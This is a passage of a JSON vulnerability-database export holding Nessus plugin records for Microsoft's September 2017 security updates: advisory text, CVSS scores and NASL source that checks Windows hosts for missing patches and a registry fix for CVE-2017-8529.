"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529"], "modified": "2020-06-04T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_CVE-2017-8529.NASL", "href": "https://www.tenable.com/plugins/nessus/136946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136946);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-8529\");\n script_bugtraq_id(98953);\n script_xref(name:\"MSKB\", value:\"4038781\");\n script_xref(name:\"MSFT\", value:\"MS17-4038781\");\n script_xref(name:\"MSKB\", value:\"4038783\");\n script_xref(name:\"MSFT\", value:\"MS17-4038783\");\n script_xref(name:\"MSKB\", value:\"4038782\");\n script_xref(name:\"MSFT\", value:\"MS17-4038782\");\n script_xref(name:\"MSKB\", value:\"4038788\");\n script_xref(name:\"MSFT\", value:\"MS17-4038788\");\n\n script_name(english:\"Windows 10 / Windows Server 2016 September 2017 Information Disclosure Vulnerability (CVE-2017-8529)\");\n script_summary(english:\"Checks for presence of the patch rollup and registry key(s).\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update or a registry setting\nrequired to enable protections for CVE-2017-8529. It is, therefore, affected by an\ninformation disclosure vulnerability:\n\n- An information disclosure vulnerability exists when affected Microsoft\nscripting engines do not properly handle objects in memory. The vulnerability\ncould allow an attacker to detect specific files on the user's computer. In a\nweb-based attack scenario, an attacker could host a website that is used to\nattempt to exploit the vulnerability.\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8529\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f6a3c24\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the Microsoft CVE article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8529\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\n\nfunction is_print_fix_enabled(kb)\n{\n var keyx86 = \"SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n var keyx64 = \"SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n registry_init();\n var result = check_print_fix(key:keyx86);\n var ret_result = FALSE;\n var report = '';\n if(result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + result + '\\n ';\n report += 'HKLM\\\\' + keyx86;\n report += '\\n';\n ret_result = TRUE;\n }\n var arch = get_kb_item('SMB/ARCH');\n if(!isnull(arch) && arch == 'x64')\n {\n var x64result = check_print_fix(key:keyx64);\n if(x64result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + x64result + '\\n ';\n report += 'HKLM\\\\' + keyx64;\n report += '\\n';\n ret_result = TRUE;\n }\n\n }\n close_registry();\n if(ret_result)\n { \n hotfix_add_report(bulletin:'MS17-06', kb:kb, report);\n }\n\n return ret_result;\n}\n\nfunction check_print_fix(key)\n{\n var hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n var key_h = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n if(isnull(key_h))\n return 'missing.';\n else if(key_h == 0)\n return 'not enabled.';\n else\n return 'set';\n}\n\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\n## NB: Microsoft \nbulletin = 'MS17-09';\nkbs = make_list(\n '4038781',\n '4038783',\n '4038782',\n '4038788'\n);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (get_kb_item('Host/patch_management_checks')) \n exit(0, 'Patch coverage provided by monthly rollup plugin.');\n\n# Update only applies to Window 10 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0 || hotfix_check_server_core() == 1 || hotfix_check_server_nano() == 1) \n audit(AUDIT_OS_SP_NOT_VULN);\n\n\nos_build = get_kb_item('SMB/WindowsVersionBuild');\n\nswitch (os_build)\n{\n case 10240: # Windows 10 RTM\n kb = '4038781';\n break;\n case 10586: # Windows 10 1511\n kb = '4038783';\n break;\n case 14393: # Windows 10 1607 / Windows Server 2016\n kb = '4038782';\n break;\n case 15063: # Windows 10 1703\n kb = '4038788';\n break;\n default:\n audit(AUDIT_OS_SP_NOT_VULN);\n}\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Run them all separately and avoid a bitwise or in the if statement\nrollupBool = (smb_check_rollup(os:'10', sp:0, os_build:os_build, rollup_date:'09_2017', bulletin:bulletin, rollup_kb_list:[kb]));\nprintfixBool = (is_print_fix_enabled());\n\nif (rollupBool || printfixBool)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T14:40:09", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when affected Microsoft scripting engines do not properly handle objects in memory. The vulnerability could allow an attacker to detect specific files on the user's computer. (CVE-2017-8529)\n\n - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8750)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8741, CVE-2017-8748)\n\n - An information disclosure vulnerability exists in Microsoft browsers due to improper parent domain verification in certain functionality. An attacker who successfully exploited the vulnerability could obtain specific information that is used in the parent domain.\n (CVE-2017-8736)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-11-30T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2017)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8736", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8748", "CVE-2017-8749", "CVE-2017-8750"], "modified": "2020-07-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS17_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104896);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/17\");\n\n script_cve_id(\n \"CVE-2017-8529\",\n \"CVE-2017-8733\",\n \"CVE-2017-8736\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8748\",\n \"CVE-2017-8749\",\n \"CVE-2017-8750\"\n );\n script_bugtraq_id(\n 98953,\n 100737,\n 100743,\n 100764,\n 100765,\n 100766,\n 100770,\n 100771\n );\n script_xref(name:\"MSKB\", value:\"4036586\");\n script_xref(name:\"MSKB\", value:\"4038792\");\n script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSKB\", value:\"4038777\");\n script_xref(name:\"MSFT\", value:\"MS17-4036586\");\n script_xref(name:\"MSFT\", value:\"MS17-4038792\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038777\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n affected Microsoft scripting engines do not properly\n handle objects in memory. The vulnerability could allow\n an attacker to detect specific files on the user's\n computer. (CVE-2017-8529)\n\n - A remote code execution vulnerability exists when\n Microsoft browsers improperly access objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8750)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services.\n (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. In a web-based attack scenario, an attacker could\n host a specially crafted website that is designed to\n exploit the vulnerability through Microsoft browsers and\n then convince a user to view the website. An attacker\n could also embed an ActiveX control marked "safe\n for initialization" in an application or Microsoft\n Office document that hosts the related rendering engine.\n The attacker could also take advantage of compromised\n websites, and websites that accept or host user-provided\n content or advertisements. These websites could contain\n specially crafted content that could exploit the\n vulnerability. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8741, CVE-2017-8748)\n\n - An information disclosure vulnerability exists in\n Microsoft browsers due to improper parent domain\n verification in certain functionality. An attacker who\n successfully exploited the vulnerability could obtain\n specific information that is used in the parent domain.\n (CVE-2017-8736)\");\n # https://support.microsoft.com/en-us/help/4036586/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?26b484bb\");\n # https://support.microsoft.com/en-us/help/4038792/windows-8-1-update-kb4038792\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?085e4d22\");\n # https://support.microsoft.com/en-us/help/4038799/windows-server-2012-update-kb4038799\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35364720\");\n # https://support.microsoft.com/en-us/help/4038777/windows-7-update-kb4038777\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1dbb18cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8741\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2020 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_reg_query.inc\");\n\nfunction is_print_fix_enabled(kb)\n{\n var keyx86 = \"SOFTWARE\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n var keyx64 = \"SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_ENABLE_PRINT_INFO_DISCLOSURE_FIX\\iexplore.exe\";\n registry_init();\n var result = check_print_fix(key:keyx86);\n var ret_result = FALSE;\n var report = '';\n if(result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + result + '\\n ';\n report += 'HKLM\\\\' + keyx86;\n report += '\\n';\n ret_result = TRUE;\n }\n var arch = get_kb_item('SMB/ARCH');\n if(!isnull(arch) && arch == 'x64')\n {\n var x64result = check_print_fix(key:keyx64);\n if(x64result != 'set')\n {\n report += '\\nThe following registry key is required to enable the fix for CVE-2017-8529 and is ' + x64result + '\\n ';\n report += 'HKLM\\\\' + keyx64;\n report += '\\n';\n ret_result = TRUE;\n }\n\n }\n close_registry();\n if(ret_result)\n { \n hotfix_add_report(bulletin:'MS17-06', kb:kb, report);\n }\n\n return ret_result;\n}\n\nfunction check_print_fix(key)\n{\n var hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n var key_h = get_registry_value(handle:hklm, item:key);\n RegCloseKey(handle:hklm);\n if(isnull(key_h))\n return 'missing.';\n else if(key_h == 0)\n return 'not enabled.';\n else\n return 'set';\n}\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-09';\nkbs = make_list(\n '4036586',\n '4038792',\n '4038799',\n '4038777'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18792\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22248\", min_version:\"10.0.9200.20000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18792\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21046\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4036586\")\n)\n hotfix_vuln = TRUE;\n printfixBool = is_print_fix_enabled(kb:'4036586');\n\nif(hotfix_vuln || printfixBool)\n{\n if (hotfix_vuln)\n {\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4036586 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4038792 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038792', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4038799 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038799', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4038777 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-09', kb:'4038777', report);\n }\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:35:45", "description": "The remote Windows host is missing security update 4038786 or cumulative update 4038799. It is, therefore, affected by multiple vulnerabilities :\n\n - A race condition that could lead to a remote code execution vulnerability exists in NetBT Session Services when NetBT fails to maintain certain sequencing requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the Windows GDI+ component improperly discloses kernel memory addresses. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681, CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server. An attacker who successfully exploited the vulnerability could either run arbitrary code on the DHCP failover server or cause the DHCP service to become nonresponsive. To exploit the vulnerability, an attacker could send a specially crafted packet to a DHCP server. However, the DHCP server must be set to failover mode for the attack to succeed. The security update addresses the vulnerability by correcting how DHCP failover servers handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the way Windows Uniscribe handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when Windows Uniscribe improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when Windows Shell does not properly validate file copy destinations. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the Windows kernel fails to properly initialize a memory address, allowing an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. An attacker who successfully exploited this vulnerability could retrieve the base address of the kernel driver from a compromised process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when Windows Hyper-V on a host operating system fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM Host Agent Service of Remote Desktop Virtual Host role when it fails to properly validate input from an authenticated user on a guest operating system. To exploit the vulnerability, an attacker could issue a specially crafted certificate on the guest operating system that could cause the VM host agent service on the host operating system to execute arbitrary code. The Remote Desktop Virtual Host role is not enabled by default. An attacker who successfully exploited the vulnerability could execute arbitrary code on the host operating system. The security update addresses the vulnerability by correcting how VM host agent service validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709, CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer improperly handles specific HTML content. An attacker who successfully exploited this vulnerability could trick a user into believing that the user was visiting a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. To exploit the vulnerability, the user must either browse to a malicious website or be redirected to it. In an email attack scenario, an attacker could send an email message in an attempt to convince the user to click a link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8747, CVE-2017-8749)\n\n - A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8759) \n - An information disclosure vulnerability exists in Microsoft browsers in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to disclose files on a user's computer. (CVE-2017-8529)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-12T00:00:00", "type": "nessus", "title": "Windows Server 2012 September 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0161", "CVE-2017-8529", "CVE-2017-8675", "CVE-2017-8676", "CVE-2017-8677", "CVE-2017-8678", "CVE-2017-8679", "CVE-2017-8680", "CVE-2017-8681", "CVE-2017-8682", "CVE-2017-8683", "CVE-2017-8684", "CVE-2017-8686", "CVE-2017-8687", "CVE-2017-8688", "CVE-2017-8692", "CVE-2017-8695", "CVE-2017-8699", "CVE-2017-8708", "CVE-2017-8709", "CVE-2017-8713", "CVE-2017-8714", "CVE-2017-8719", "CVE-2017-8720", "CVE-2017-8728", "CVE-2017-8733", "CVE-2017-8737", "CVE-2017-8741", "CVE-2017-8747", "CVE-2017-8749", "CVE-2017-8759"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038799.NASL", "href": "https://www.tenable.com/plugins/nessus/103132", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package 